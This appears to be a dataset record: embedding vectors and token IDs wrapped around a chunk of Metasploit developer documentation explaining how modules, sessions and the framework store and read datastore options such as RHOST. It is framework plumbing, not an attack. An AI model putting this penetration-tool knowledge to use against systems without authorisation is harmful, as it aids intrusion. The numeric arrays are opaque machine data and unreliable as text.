-0.5162495970726013, -0.3936587870121002, -0.3597903251647949, -0.7128008008003235, 0.054929472506046295, -0.17124232649803162, 0.10021700710058212, 0.8135718703269958, -0.4146394431591034, -0.7890455722808838, 0.09232449531555176, -0.3630159795284271, 0.6297402381896973, -0.27976274490356445, 0.24835263192653656, -0.2106601446866989, 1.0195142030715942, -0.07363265007734299, 0.45087072253227234, -0.431329607963562, 0.21501272916793823, -0.3372679650783539, -0.2728400230407715, -0.3347013294696808, 0.18242232501506805, 0.1024380773305893, 0.06770814955234528, -0.22933875024318695, 0.29459938406944275, 1.1737933158874512, 0.8469094038009644, -0.11020339280366898, -0.4226095676422119, 0.23334188759326935, 0.6161121129989624, -0.6984947919845581, 1.0754013061523438, 0.2626444399356842, 0.3212047517299652, -0.008790766820311546, 0.10310914367437363, -0.07783482223749161, -0.39506182074546814, -0.40913498401641846, -0.22038814425468445, -0.6405597925186157, 0.4626557528972626, -0.017024846747517586, 0.34761568903923035, 0.7456539273262024, 0.28880518674850464, -0.7378520369529724, 0.7484126091003418, -0.3435298502445221, -0.7879173159599304, -0.43159106373786926, 0.5302726030349731, -0.6192659735679626, 0.4418148100376129, -0.05982714146375656, -0.6077209115028381, 0.18371212482452393, 0.14017224311828613, 0.05932207778096199, 0.4065897762775421, 0.7011860609054565, -0.08772438764572144, -0.818655252456665, -0.11682340502738953, -0.17158576846122742, -0.3014225959777832, -0.5163130760192871, 0.21154186129570007, -0.3819296360015869, 0.2548958659172058, 0.286773145198822, 0.04703577235341072, 0.9411402344703674, 0.5130078196525574, 0.13658683001995087, -0.5240376591682434, 0.36279600858688354, 0.3948271572589874, 0.0704008936882019, 0.3255111277103424, -0.2237994372844696, 1.120642900466919, 0.35753145813941956, 1.1951905488967896, -0.0487062893807888, -0.49209630489349365, 0.47679978609085083, 0.28511500358581543, -0.49070560932159424, 0.31911006569862366, 0.03439389914274216, 0.9495712518692017, 0.20626051723957062, 0.6805593371391296, 0.5217909216880798, 0.19068919122219086, 0.2447979748249054, 0.14013619720935822, -0.08910620957612991, 0.7614758014678955, -0.46300268173217773, 0.6870431303977966, 0.4943022131919861, -0.4704381823539734, -0.8215765357017517, -0.5008020997047424, -0.004631795454770327, 0.25957101583480835, -0.3040163218975067, -0.8319686651229858, 0.12626370787620544, -0.20217613875865936, -0.890811026096344, -0.4102693796157837, 0.36560529470443726, 0.20145107805728912, -0.4775850176811218, 0.11315932869911194, -0.11848290264606476, -0.9755436182022095, -0.4566856622695923, -0.10534635186195374, -0.7105910778045654, -0.26899781823158264, -0.6287528276443481, -0.018239954486489296, -0.30754250288009644, -0.3233379125595093, 0.40303781628608704, -0.12694968283176422, -0.5378968119621277, 0.1337120532989502, 0.06640564650297165, 0.3368109464645386, 0.32008761167526245, -0.6022250652313232, -0.7414050698280334, -0.09098703414201736, -0.4136918783187866, 0.8171256184577942, -0.27680709958076477, -0.6407179832458496, -0.22244079411029816, 0.1398220956325531, 0.32943108677864075, 0.36952197551727295, 1.0042911767959595, 0.17315849661827087, -0.41717299818992615, -0.3282131552696228, -0.1796695590019226, 0.1078169122338295, 0.29810789227485657, 0.3141162693500519, -0.19361647963523865, -0.2524898946285248, 0.04235251247882843, 0.01161886751651764, 0.3646281659603119, 1.0385040044784546, -0.8832908868789673, -0.0471629872918129, 0.15145309269428253, 0.7013614177703857, -0.6157174706459045, -0.31393781304359436, 0.0402374342083931, -0.043846312910318375, 0.04889300465583801, -0.3679831922054291, 0.1633567065000534, -0.14844435453414917, 0.08157404512166977, -0.2544781565666199, -0.37510359287261963, 0.9986543655395508, -0.3467906713485718, -1.0082603693008423, 0.47376519441604614, -0.48963868618011475, -0.6964043378829956, 0.11581858992576599, -0.07270845770835876, 0.4538995325565338, 0.02522788569331169, 0.3856131136417389, -0.674219012260437, -0.1861017942428589, 0.1587045043706894, 0.14845746755599976, 0.08807472884654999, -0.48872512578964233, 0.7669845223426819, -0.11296166479587555, -0.23797905445098877, 0.05435609817504883, 0.38104599714279175, -0.6358341574668884, -0.4677554666996002, -0.4243059754371643, 0.15675833821296692, 0.013287409208714962, 0.6514674425125122, 0.4931218922138214, 0.47183260321617126, 0.8208778500556946, -0.38149338960647583, 0.4649393558502197, 0.5703736543655396, -0.042803388088941574, 0.7881748080253601, 0.4009779095649719, -0.7512792944908142, -0.11092772334814072, -0.25842148065567017, -0.32239681482315063, 0.20465828478336334, 0.4035106897354126, 0.42373234033584595, -0.08873660117387772, 0.48143142461776733, -0.49086225032806396, -0.25607648491859436, 0.4397352337837219, 0.24327442049980164, -0.8059212565422058, 0.7543283700942993, -0.14958564937114716, 0.743965208530426, -0.19495220482349396, 0.47987544536590576, -0.5758496522903442, 0.11113445460796356, -0.33878764510154724, 0.38747379183769226, 0.038057126104831696, -0.8004738688468933, -0.6550084948539734, -0.43564891815185547, -0.3532762825489044, -0.13492068648338318, -0.2131224274635315, 0.4440603256225586, 0.0973229631781578, -0.4953301250934601, -0.49739745259284973, 1.1015679836273193, 0.8641141057014465, 0.71172696352005, 0.7569988965988159, 1.4408280849456787, -0.24365483224391937, -0.5763027667999268, 0.32183876633644104, -0.13212861120700836, 0.5627511739730835, -0.05654630810022354, 0.2554720640182495, -0.06408059597015381, 0.5247442722320557, 0.002462814562022686, 0.2918287217617035, -0.7109265327453613, -0.009479095228016376, 0.010025644674897194, -0.43255415558815, -0.22862477600574493, -0.5066143870353699, 0.11829932779073715, 0.538055956363678, -0.25364452600479126, -0.23808905482292175, -0.053156498819589615, 0.3003249764442444, 0.5044803619384766, -0.7368122935295105, -0.1915920227766037, -0.3544497787952423, -0.32356539368629456, -0.3740648329257965, 0.41229313611984253, -0.6223689913749695, -0.9421747922897339, -0.015143509954214096, -0.35727792978286743, 0.6193345189094543, 0.5155988335609436, 0.15764078497886658, 0.06567208468914032, -0.352790892124176, -0.1642276793718338, 0.05448388308286667, -0.3358295261859894, -0.7098755240440369, 0.26730212569236755, 0.3497637212276459, -0.30910754203796387, 0.5436403155326843, -0.4436226785182953, -0.38513249158859253, 0.5057934522628784, -0.18683025240898132, 0.7827249765396118, -1.0119611024856567, 0.9859490394592285, 0.5234485268592834, -0.24445584416389465, -0.14051812887191772, 0.11441399157047272, -0.6940956115722656, -0.1612117886543274, -0.6187675595283508, -0.3540261387825012, -0.24160011112689972, -0.24397975206375122, 0.7256491184234619, -0.6129705309867859, -0.4104582369327545, 1.2777910232543945, 0.31786808371543884, -0.42470934987068176, 0.4406118392944336, -0.29666125774383545, -0.7443657517433167, 0.3684776723384857, -1.0493903160095215, 0.6402812600135803, -0.4288395047187805, 0.05207943916320801, 0.23372803628444672, -0.5103379487991333, 1.2804733514785767, 0.062155429273843765, 0.37173670530319214, -0.5434327721595764, -0.4267452657222748, -0.025497188791632652, 0.39919009804725647, 0.053503409028053284, 0.40534114837646484, -0.38948899507522583, -0.37630710005760193, -0.2769840657711029, -0.32868558168411255, -0.7445319890975952, -0.42602047324180603, -0.03990434110164642, 0.02267024852335453, -0.10849662125110626, 0.2615153193473816, 0.23730593919754028, -0.012187295593321323, -0.8502213358879089, 0.5306065678596497, -0.5662509202957153, 0.3530119061470032, -0.9057608842849731, -0.27992677688598633, -0.3077561855316162, 0.09196960180997849, -0.4098210632801056, 0.46236854791641235, -0.4958627223968506, -0.16901877522468567, -0.03131575509905815, -0.19845567643642426, 0.07613617926836014, -0.7125051021575928, 0.12105225771665573, 0.32581865787506104, 0.20373748242855072, -0.5692533254623413, 0.15840326249599457, 0.3035544753074646, 0.07478675991296768, 0.21381866931915283, -0.6480964422225952, -0.013676811009645462, -0.7233855128288269, -0.6408489346504211, 0.248533695936203, 0.13420237600803375, 0.6995231509208679, -0.8752580881118774, -0.7159079313278198, -0.351326048374176, 0.38170236349105835, 0.6782748103141785, -0.097124844789505, -0.14565914869308472, 0.015258570201694965, 0.4075740873813629, -0.5269201397895813, -0.41236475110054016, 0.1981523633003235, -1.3555998802185059, -0.045454274863004684, 0.8134742379188538, 0.04743766039609909, 0.14440324902534485, 0.39620429277420044, -0.08783818036317825, 0.4563915729522705, -0.05080888420343399, -0.6347532868385315, -0.17122000455856323, -0.4164189398288727, 0.2275623381137848, -0.21742850542068481, 0.4228198230266571, -0.2088850736618042, 0.33319318294525146, 0.03869117051362991, 0.4472372531890869, -0.16701196134090424, -0.48884841799736023, 0.46765410900115967, 0.08303910493850708, 0.7029716372489929, -0.5056318044662476, 0.23271001875400543, -0.1691153347492218, 0.9014286398887634, 0.12587672472000122, -0.013731461018323898, -0.29495230317115784, 0.18223842978477478, -0.6366936564445496, -0.9639383554458618, 0.8264727592468262, -0.2659507989883423, 0.1969822198152542, 0.49063703417778015, -0.24282227456569672, 1.1584527492523193, -0.20476806163787842, -0.06854512542486191, 0.9122270941734314, 0.489034503698349, 0.18223068118095398, -1.0203865766525269, 0.3845559060573578, 0.3589601218700409, 0.042588066309690475, 0.5812348127365112, -0.14470422267913818, -0.06790752708911896, -0.39810851216316223, -0.23359772562980652, -0.32941028475761414, -0.5734886527061462, -0.333888977766037, 0.5717651844024658, -0.0386766716837883, 0.6364182829856873, -0.6684750318527222, -0.43213599920272827, -0.37775519490242004, 0.08276991546154022, -0.24864992499351501, -0.13094168901443481, 0.6949405670166016, 0.4326053261756897, 0.8652524352073669, 0.03743353486061096, 0.5348492860794067, -0.03306601196527481, -0.19744403660297394, 0.39925435185432434, 0.6894921064376831, -0.8438849449157715, 0.9364916086196899, 0.5266936421394348, -1.1511790752410889, -0.37513187527656555, -0.9636113047599792, 0.00011068995809182525, 0.1300879865884781, -0.43382811546325684, -0.5032473802566528, 0.18819893896579742, 0.4014051556587219, 0.6689298748970032, -0.15582656860351562, 0.07892201840877533, 0.4702567458152771, -0.9690326452255249, 0.34548646211624146, -0.47426390647888184, 0.10796239227056503, 0.3772242069244385, -0.9379245638847351, -0.40863290429115295, -0.4793816804885864, 0.04060889035463333, 0.20320719480514526, -0.31511160731315613, 1.078027606010437, -0.13497477769851685, 0.6256365180015564, -0.03597484901547432, 0.29830268025398254, 0.5569512844085693, -0.052178576588630676, 0.48655736446380615, 1.0655008554458618, -0.1993715912103653, -0.7044062614440918, -0.09674406051635742, -0.026185816153883934, -0.0016475776210427284, 0.6390579342842102, -0.25898459553718567, -0.24350357055664062, -0.049755048006772995, 0.09548311680555344, -0.29006895422935486, -0.6783211827278137, -0.38517439365386963, -0.9567574262619019, -0.1571674644947052, 0.07942137122154236, -0.3284173011779785, 0.2926434278488159, 0.020126724615693092, -0.4073871076107025, -0.5233563184738159, -0.36554792523384094, 0.267973393201828, 0.13433003425598145, -0.17649121582508087, 0.14935056865215302, -0.31420910358428955, -1.0607632398605347, -0.4548856019973755, -0.7883740067481995, -0.16267754137516022, -0.20200860500335693, -0.8312526941299438, -0.3198097348213196, 0.02729397639632225, -0.5874605774879456, 0.009757138788700104, -1.1133779287338257, 0.15731891989707947, -0.3896193504333496, -0.8898133635520935, 0.25956329703330994, 0.05167254060506821, -0.9959263801574707, 0.43291085958480835, 0.388131320476532, 0.544442355632782, 0.37069180607795715, -0.6681373119354248, 0.3781566619873047, 0.12136192619800568, -0.05177152901887894, 0.3663172125816345, -0.28267380595207214, -1.039050579071045, 0.8453587889671326, 0.3137809634208679, -0.6247555613517761, -0.033271513879299164, -1.0985110998153687, -0.30540210008621216, 0.07414788007736206, -0.24786661565303802, 0.33724191784858704, 0.736873984336853, 0.61723792552948, -0.02256125584244728, -0.16498462855815887, 0.5018004775047302, 0.1639779955148697, -0.6864913702011108, 0.047451213002204895, 0.5770583152770996, -0.15944646298885345, -0.5497338771820068, -0.17606796324253082, 0.6252467036247253, -0.4823075532913208, 0.10429775714874268, 0.2677193880081177, 0.18312229216098785, -0.4766564965248108, -0.14264929294586182, 0.29756131768226624, 0.6251543164253235, 0.8254597783088684, -0.18520113825798035, 0.3989141583442688, -0.19517868757247925, -0.5692424774169922, -0.017080504447221756, -0.3737957179546356, -0.06279423832893372, 0.1172962412238121, 0.049269914627075195, -0.3403927683830261, -0.6930273175239563, -0.5841875076293945, 0.1430007368326187, -0.1847606748342514, 0.5741786360740662, 0.6614025235176086, 0.03511005640029907, -0.10050658881664276, 1.1986006498336792, -0.34992730617523193, -0.5013975501060486, -0.44728249311447144, 0.44517213106155396, -0.5595182776451111, -0.9273301362991333, 0.18224099278450012, 0.9312986731529236, 0.5632031559944153, -0.07999678701162338, -0.27616819739341736, 0.1268025040626526, 0.1463700234889984, 0.5737691521644592, -0.2977388799190521, -0.19112414121627808, -0.15755537152290344, 0.24717333912849426, -0.5745428800582886, 0.3723604679107666, -0.43203818798065186, 0.4210137724876404, -0.11229090392589569, -0.33783116936683655, -0.03301828354597092, 0.8821554183959961, -0.5223937630653381, -0.4273819625377655, 0.7008602023124695, 0.4087482690811157, 0.32737743854522705, -0.7363020777702332, -0.0703248679637909, -0.07112956047058105, 0.42258480191230774, 0.4312465786933899, 0.44003188610076904, 0.23448115587234497, 0.08303837478160858, 0.5902358889579773, -0.636472225189209, -0.2750256359577179, 0.5909737944602966, 0.4532448351383209, 0.12644818425178528, -0.21398532390594482, -0.2530090808868408, -0.3469460904598236, -0.668063223361969, -0.07195645570755005, 0.4799107313156128, 0.21616287529468536, 0.633804440498352, -0.2653363347053528, -0.5205514430999756, 0.8249375820159912, -0.748362123966217, 0.15338702499866486, 0.23060820996761322, 0.7642601132392883, 0.4233703315258026, 0.009421766735613346, -0.8278120160102844, 0.504730761051178, 0.8332240581512451, -0.0009649532730691135, -0.2007182091474533, 0.2987966239452362, 0.19247612357139587, 0.7374801635742188, -0.34477972984313965, 0.2179519236087799, -0.44223377108573914, 0.22196049988269806, 0.10162682086229324, -1.1020677089691162, -0.45566150546073914, 0.16897223889827728, 0.4719679057598114, -0.07957238703966141, -0.05176554620265961, -0.4879612922668457, 0.6532723903656006, -1.131659746170044, 0.3026711046695709, -0.03866659104824066, -0.19459854066371918, 0.19640502333641052, -0.44038909673690796, -0.4114215672016144, 0.8351662158966064, 0.1115938201546669, 0.45837053656578064, 0.15352220833301544, 1.058644413948059, 0.37622031569480896, 0.1341526210308075, 0.07061091810464859, -0.7148051857948303, -0.2844899296760559, 0.08771257102489471, -0.38085049390792847, -0.3367334306240082, 0.2563526928424835, -0.3060956597328186, -0.009594717063009739, -0.17072787880897522, -0.27496856451034546, -0.4066053032875061, 0.19851931929588318, -0.3306306004524231, -0.4066837728023529, 0.16797079145908356, 0.0038539196830242872, -0.9116957187652588, -0.4261796474456787, 0.2350609004497528, 0.08911896497011185, 0.6714032888412476, -0.27246710658073425, -0.973840057849884, -0.2510174512863159, 0.2457105815410614, -0.18333818018436432, 0.2641129791736603, -0.30700159072875977, -0.2555469870567322, 0.16410285234451294, -1.1981176137924194, -0.3100226819515228, 0.3408472537994385, -0.3582353889942169, -0.2583383023738861, 0.7199721336364746, 0.3877970576286316, 0.7837945222854614, 0.6880313158035278, 0.021711714565753937, -0.00028508075047284365, 0.19650834798812866, 0.9017592072486877, -0.6690670251846313, 0.7566459774971008, 0.24514071643352509, -0.12066149711608887, 0.004885077942162752, 0.11711452156305313, 0.39326465129852295, 0.018936557695269585, -0.14903077483177185, -0.09440397471189499, 0.097022645175457, -0.4852585196495056, -0.37100595235824585, 0.18834327161312103, -0.4466021955013275, 0.15258532762527466, 0.2245088517665863, -0.566649854183197, -0.20386776328086853, -0.34457632899284363, -0.162745863199234, -0.5084766149520874, 0.3128020167350769, -0.4341268837451935, -0.1593720018863678, 0.24046476185321808, -1.0139105319976807, 4.431407928466797, 0.7719221711158752, 0.9480093717575073, -0.1703420877456665, -0.04384957253932953, 0.8465132713317871, 0.6293632388114929, -0.30411532521247864, 0.3236144483089447, -0.8146542310714722, -0.049621161073446274, -0.1153232753276825, 0.02289929799735546, 0.5558216571807861, 0.13705462217330933, 0.36661863327026367, -0.9616310000419617, 0.39667484164237976, 0.33268916606903076, -0.5848084688186646, -0.7583848237991333, 0.03311851620674133, -0.4090268015861511, 0.9551944732666016, -0.3559933304786682, -0.12678661942481995, 0.02693031169474125, -1.3600319623947144, 0.3993052542209625, -0.614077627658844, 0.29806703329086304, -0.6317041516304016, 0.30128175020217896, 0.552297830581665, -0.7908343076705933, -0.1579703688621521, 0.12988919019699097, -0.6348029375076294, -0.11372319608926773, -0.22615306079387665, 0.6644340753555298, 0.07811351865530014, 0.022379744797945023, -0.18654756247997284, -0.235362708568573, 0.5482175350189209, -0.681084156036377, 0.17046070098876953, 0.43842995166778564, -0.7640347480773926, 0.7615335583686829, -0.20617976784706116, 0.8268529176712036, 0.15488408505916595, -1.0123382806777954, 0.5201827883720398, 0.274302214384079, -0.5619919300079346, -0.1388610303401947, -0.1839926689863205, 0.1349695324897766, -0.3891225755214691, 0.037292882800102234, -0.045311909168958664, -0.1286715418100357, 0.06399393826723099, -0.012831861153244972, 0.23589178919792175, -0.17256321012973785, 0.12283779680728912, -0.3715818524360657, 0.2715584337711334, -0.45103996992111206, -0.5817341208457947, 1.1589552164077759, -0.49342837929725647, -0.2532734274864197, -0.04341137781739235, 0.2008395940065384, -0.19646751880645752, -0.33823060989379883, -0.36827319860458374, -0.8792493343353271, 0.41577816009521484, 0.3277539908885956, 0.6173869371414185, -0.3686017692089081, -0.844025731086731, 0.37430819869041443, -0.06292401254177094, 0.07167606800794601, 0.7289979457855225, -0.48386552929878235, 0.7288898825645447, 0.4552322030067444 ]
[ 101, 2951, 23809, 2063, 5724, 19184, 2050, 2951, 23809, 2063, 5724, 2003, 1037, 2828, 1997, 8023, 2008, 2064, 2022, 2275, 2011, 1996, 5310, 1010, 4352, 2536, 6177, 1997, 18804, 13102, 4135, 4183, 2000, 2022, 2062, 9530, 8873, 27390, 3085, 2076, 2224, 1012, 2005, 2742, 1010, 1999, 5796, 11329, 5644, 9890, 1010, 2017, 2064, 2275, 1996, 10122, 21197, 4726, 5724, 1999, 2344, 2000, 8833, 2035, 1996, 10122, 7953, 1013, 6434, 1011, 2242, 2008, 1521, 1055, 2785, 1997, 18801, 2005, 12653, 5682, 2076, 1037, 7279, 22199, 1012, 2043, 2017, 7170, 1037, 11336, 1010, 2045, 2097, 2022, 1037, 2843, 2062, 7047, 5068, 2011, 1996, 4666, 2378, 1006, 1055, 1007, 2030, 1996, 11336, 1012, 2070, 2691, 3924, 2421, 1054, 15006, 3215, 1998, 1054, 6442, 2005, 1037, 8241, 1011, 2217, 18077, 2030, 9830, 11336, 1010, 5034, 2615, 15006, 2102, 2005, 1037, 7396, 1011, 2217, 11336, 1010, 4385, 1012, 1996, 2190, 2126, 2000, 2424, 2041, 3599, 2054, 2951, 23809, 2063, 7047, 2017, 2064, 2275, 2003, 2011, 2478, 2122, 10954, 1024, 2265, 7047, 1011, 3065, 2017, 2035, 1996, 3937, 7047, 1012, 2265, 3935, 1011, 3065, 2017, 2035, 1996, 3935, 7047, 1012, 2265, 4394, 1011, 3065, 2017, 2035, 1996, 3223, 7047, 2017, 2031, 2025, 26928, 1012, 2275, 1011, 3065, 2017, 2673, 1012, 5525, 1010, 2017, 2036, 2224, 2023, 3094, 2000, 2275, 2019, 5724, 1012, 5724, 4216, 1024, 11336, 2850, 10230, 19277, 1010, 3161, 1035, 11336, 1010, 5219, 1010, 1998, 7705, 2129, 5198, 2298, 2012, 2951, 23809, 2063, 7047, 2239, 1996, 5310, 1521, 1055, 2217, 1010, 2951, 23809, 2063, 7047, 2024, 2464, 2004, 3795, 2030, 11336, 1011, 2504, 1024, 3795, 2965, 2035, 1996, 14184, 2064, 2224, 2008, 5724, 1010, 2029, 2064, 2022, 2275, 2011, 2478, 1996, 2275, 2290, 3094, 1012, 11336, 1011, 2504, 2965, 2069, 2008, 3327, 11336, 2017, 1521, 2128, 2478, 17749, 2008, 2951, 23809, 2063, 5724, 1010, 2053, 2060, 6177, 2097, 2113, 2055, 2009, 1012, 2017, 2024, 4292, 1037, 11336, 1011, 2504, 5724, 2065, 2017, 7170, 1037, 11336, 2034, 1010, 1998, 2059, 2224, 1996, 2275, 3094, 1010, 2066, 1996, 2206, 1024, 5796, 2546, 1028, 2224, 18077, 1013, 3645, 1013, 15488, 2497, 1013, 5796, 2692, 2620, 1035, 5757, 2581, 1035, 5658, 9331, 2072, 5796, 2546, 18077, 1006, 5796, 2692, 2620, 1035, 5757, 2581, 1035, 5658, 9331, 2072, 1007, 1028, 2275, 1054, 15006, 2102, 2184, 1012, 1014, 1012, 1015, 1012, 1017, 1054, 15006, 2102, 1027, 1028, 2184, 1012, 1014, 1012, 1015, 1012, 1017, 2129, 18804, 13102, 4135, 4183, 9797, 2298, 2012, 2951, 23809, 2063, 7047, 2239, 1996, 2458, 2217, 1010, 2477, 2024, 1037, 2210, 13675, 16103, 2121, 1012, 2951, 23809, 2063, 7047, 2941, 2064, 2022, 2179, 1999, 2012, 2560, 2176, 2367, 4216, 1024, 1996, 11336, 2850, 10230, 19277, 4874, 1010, 3161, 1035, 11336, 1010, 5219, 4874, 1010, 2030, 1996, 7705, 4874, 1012, 2065, 2017, 1521, 2128, 2074, 2725, 11336, 2458, 1010, 1996, 2190, 3120, 2017, 2064, 3404, 2003, 1996, 11336, 2850, 10230, 19277, 4874, 1012, 2023, 4874, 2038, 1037, 3563, 7170, 2344, 2077, 13041, 2017, 1996, 5724, 2017, 2215, 1024, 2065, 1996, 5724, 2064, 2022, 2179, 1999, 1996, 11336, 1521, 1055, 2951, 23809, 2063, 1010, 2009, 2097, 2507, 2017, 2008, 1012 ]
metasploit
116.txt
0
if not found, it will give you the one from framework. the following is an example of how to read a datastore option in a module : current _ host = datastore ['rhost'] if your dev work is outside the module realm, there is a good possibility that you don ’ t even have the moduledatastore object. but in some cases, you still might be able to read from the active _ module accessor from the driver. or if you have access to modulecommanddispatcher, there is a mod method too that gives you the same thing, and sometimes mixins pass this around in a run _ simple method while dispatching a module. one example you can look at is the msf : : ui : : console : : commanddispatcher : : auxiliary class. in some cases such as running a script in post exploitation, you might not have moduledatastore or even active _ module, but you should still have a session object. there should be an exploit _ datastore that gives you all the datastore options : session. exploit _ datastore if you don ’ t have access to the module, or to a session object, the last source is obviously the framework object, and there is always a framework object. however, like we said earlier, if the user sets a module - level option, no other components will see it, this includes the framework object : framework. datastore so now you know there are multiple sources of datastore options. and hopefully at this point you are well aware that not all sources necessarily share the same thing. if you have to try everything, as a general rule, this should be your load order : try from the moduledatastoretry from active _ moduletry from sessiontry from framework core option typesall core datastore option types are defined in the option _ container. rb file as classes. you should always pick the most appropriate one because each has its own input validator. when you initialize an option during datastore registration, it should be in the following format : optsomething. new ( option _ name, [ boolean, description, value, * enums * ], aliases : * aliases *, conditions : * conditions * ) option _ name - clearly means the name of the datastore option. boolean - the first attribute, true means this is a required option, false means optional. description - a short description about this option
[ -0.16871769726276398, -0.21558430790901184, 0.01770315133035183, 0.3804989457130432, -1.1005696058273315, -0.782008945941925, 0.810363233089447, 0.39842018485069275, -0.04383700340986252, 1.1253628730773926, 0.5437288880348206, -0.08286784589290619, 0.6233461499214172, -0.29842451214790344, -0.28099292516708374, 0.12374977767467499, -0.3161720335483551, 0.299533873796463, -1.4337717294692993, 0.07477650791406631, 0.8081919550895691, -0.3204312026500702, -0.8655651211738586, -1.0797878503799438, -0.4311871826648712, 0.6096840500831604, 0.5408525466918945, 0.0944395512342453, 0.5993744134902954, 1.463620662689209, -0.03323547542095184, -0.08290253579616547, 0.274879515171051, 0.1245611160993576, -0.22767329216003418, 0.14247645437717438, 0.2372642159461975, -0.32167068123817444, 0.2231152504682541, -1.0265947580337524, 0.1666482537984848, -0.40261968970298767, -0.11481846123933792, -0.5037570595741272, -0.41854357719421387, -0.26767897605895996, -0.4069644510746002, -0.2543697953224182, 0.32181316614151, -0.4796378016471863, 0.12326738238334656, 0.2982403039932251, 0.43755558133125305, 0.2841658294200897, 0.2148623913526535, 0.11768774688243866, 0.2986129820346832, 0.19082044064998627, -0.5026480555534363, 0.2037326991558075, -0.31035587191581726, 0.14305801689624786, 0.3175976276397705, -0.5219168066978455, 0.22565153241157532, 0.23453371226787567, -0.007664844859391451, -0.23628735542297363, -0.3744311034679413, -0.5267375111579895, -0.05611646547913551, 1.101916790008545, -0.11635132879018784, -1.1815108060836792, -0.42373302578926086, 0.0047530680894851685, 0.40274664759635925, -0.09870670735836029, -0.6908828020095825, 0.3491349518299103, -0.2561815083026886, 0.6645446419715881, 0.8807498812675476, -0.12414617836475372, -0.42870381474494934, -0.11692529916763306, 0.5864391922950745, 0.6157365441322327, -0.5389279127120972, 0.3062824308872223, 0.5321377515792847, 0.4914573132991791, -0.43210330605506897, 0.18459951877593994, 0.9518503546714783, 0.8468950390815735, -0.19598506391048431, 0.03213824704289436, 0.07062850892543793, -0.626050591468811, 0.6440631747245789, 0.6668726801872253, 0.4358557462692261, 0.08812335133552551, 0.008630560711026192, 0.36011767387390137, -0.042675621807575226, 0.4411098062992096, -0.39970701932907104, 0.16855067014694214, 0.16307412087917328, -0.43666234612464905, 0.5479382276535034, -1.178398847579956, -0.09259611368179321, 0.7103636264801025, 0.7067846655845642, -0.187151238322258, -0.4715336859226227, 0.892799973487854, 0.29547667503356934, -0.39223548769950867, -0.015654848888516426, -0.36140215396881104, 0.24207402765750885, -0.1821068376302719, 0.6879395246505737, 0.49140918254852295, -0.7143516540527344, 0.05282574146986008, -0.44994017481803894, -0.15810401737689972, -0.11399994790554047, 1.223551630973816, 0.14699846506118774, 0.03216903656721115, -0.15885737538337708, 0.3208141624927521, 0.24261897802352905, -0.9257736802101135, 0.2232038378715515, 0.4432137608528137, -0.12957251071929932, 1.1392444372177124, 0.15519209206104279, -0.9050750136375427, -0.36470210552215576, -0.6822491884231567, -0.930350124835968, 0.4801695644855499, -0.2661494314670563, 0.11542324721813202, 0.8663027882575989, -0.7973541617393494, -0.8766665458679199, 0.21145661175251007, -0.2678535282611847, 0.7088380455970764, 0.42560911178588867, 0.14074508845806122, -0.0870102196931839, 0.8177589774131775, 0.08700177073478699, 0.780946671962738, -0.5966532230377197, 0.41678088903427124, -0.30677473545074463, -0.2724885642528534, -0.0648220106959343, 0.27889496088027954, 0.05999358743429184, -0.2275862991809845, -0.26154640316963196, 0.21620981395244598, 1.1653248071670532, 0.9942184686660767, -0.20448483526706696, -0.2668757736682892, -0.02043096348643303, 1.1510100364685059, -0.4959278702735901, 0.46667400002479553, 0.2637239694595337, 0.06228738650679588, 0.007392558269202709, -0.3067377805709839, -0.2480626404285431, -0.7400338053703308, -0.38996148109436035, 0.08250758051872253, -0.3279205560684204, 0.6117876768112183, -0.01784111186861992, 0.7431802749633789, 0.5044420957565308, 0.30705320835113525, -1.3734240531921387, 0.5013193488121033, 0.15695790946483612, -1.2376312017440796, -0.5518038868904114, 0.41916683316230774, -0.02457665652036667, 0.3447133004665375, -0.1929607391357422, -0.7750052809715271, 0.36609387397766113, 0.4216412305831909, -0.09716875851154327, 0.6017146110534668, 0.7796015739440918, -0.15566395223140717, -1.0564080476760864, -0.0340292863547802, -0.40278559923171997, -0.44089946150779724, -0.6806961297988892, 0.08625844120979309, 0.0811222568154335, 0.02045685425400734, 0.43586060404777527, 0.8163895010948181, 0.6577023863792419, 0.6201090216636658, -0.07956382632255554, -0.9171499609947205, 0.6631351113319397, 0.3460151255130768, -0.2598460614681244, 0.2401731014251709, -0.39691677689552307, 1.0869704484939575, 0.4281626343727112, 0.9151610732078552, 0.39010536670684814, -0.35533827543258667, 0.8062896728515625, 0.25867077708244324, -0.010240859352052212, 0.34512266516685486, -0.19055655598640442, 1.2731282711029053, 0.21534354984760284, 0.7402885556221008, 0.2453404664993286, 0.36065909266471863, 0.2790340185165405, -0.24546478688716888, 0.22365032136440277, 1.1479438543319702, -0.6954575777053833, 0.5536337494850159, -0.09130082279443741, -0.49673691391944885, -0.6534306406974792, -0.7118414640426636, 0.3757596015930176, 0.6102193593978882, -0.5843609571456909, -0.8358615040779114, 0.489968866109848, -0.22998689115047455, -0.7143763303756714, -0.024301767349243164, 0.0633763000369072, 0.025065045803785324, -0.4911110997200012, 0.3277437388896942, 0.21186518669128418, -1.013684630393982, -0.3145841956138611, -0.05077050253748894, -1.0002838373184204, 0.05406882241368294, -0.8795296549797058, 0.11438717693090439, -0.07649849355220795, -0.5808201432228088, 0.541580080986023, -0.7930687069892883, -0.9871029853820801, -0.15521496534347534, -0.13369961082935333, 0.21117570996284485, 0.4424026608467102, -0.36016467213630676, -0.7290434837341309, 0.1421678513288498, -0.8766348958015442, 0.7969081997871399, 0.34438225626945496, -0.3881329298019409, -0.46767157316207886, -0.16967414319515228, 0.6838215589523315, 0.09217719733715057, 0.8615683913230896, -0.16598473489284515, -1.0852640867233276, -0.5028017163276672, -0.1696835458278656, -0.3865709900856018, 0.366184800863266, 0.5697762370109558, -0.3270784020423889, 0.19388525187969208, 0.1537092924118042, 0.1731530725955963, 0.6963278651237488, 1.2267711162567139, -0.9639485478401184, 0.13030701875686646, 0.0557565875351429, 0.8529373407363892, -0.6057204604148865, 0.0050914534367620945, 0.29759693145751953, 0.13918615877628326, 0.012861634604632854, -0.5517372488975525, 0.03171219676733017, -0.4060947000980377, 0.29880860447883606, -0.3171490728855133, -0.3436066508293152, 0.8437146544456482, -0.7662665247917175, -1.0002394914627075, 0.31547021865844727, -0.8283495306968689, -0.66910320520401, 0.11130311340093613, -0.13650108873844147, 0.8304576277732849, -0.05669357255101204, 0.397938996553421, -0.48435452580451965, -0.6668291091918945, 0.5003868937492371, 0.5467196106910706, -0.0981966182589531, -0.4489874839782715, 0.43392863869667053, -0.5056752562522888, -0.38824230432510376, -0.026597393676638603, 0.4318479001522064, -0.5036288499832153, -0.18723157048225403, -0.3877626955509186, 0.2936237156391144, 0.014836926944553852, 0.2833496928215027, 0.37081727385520935, 0.6526714563369751, 0.9878595471382141, 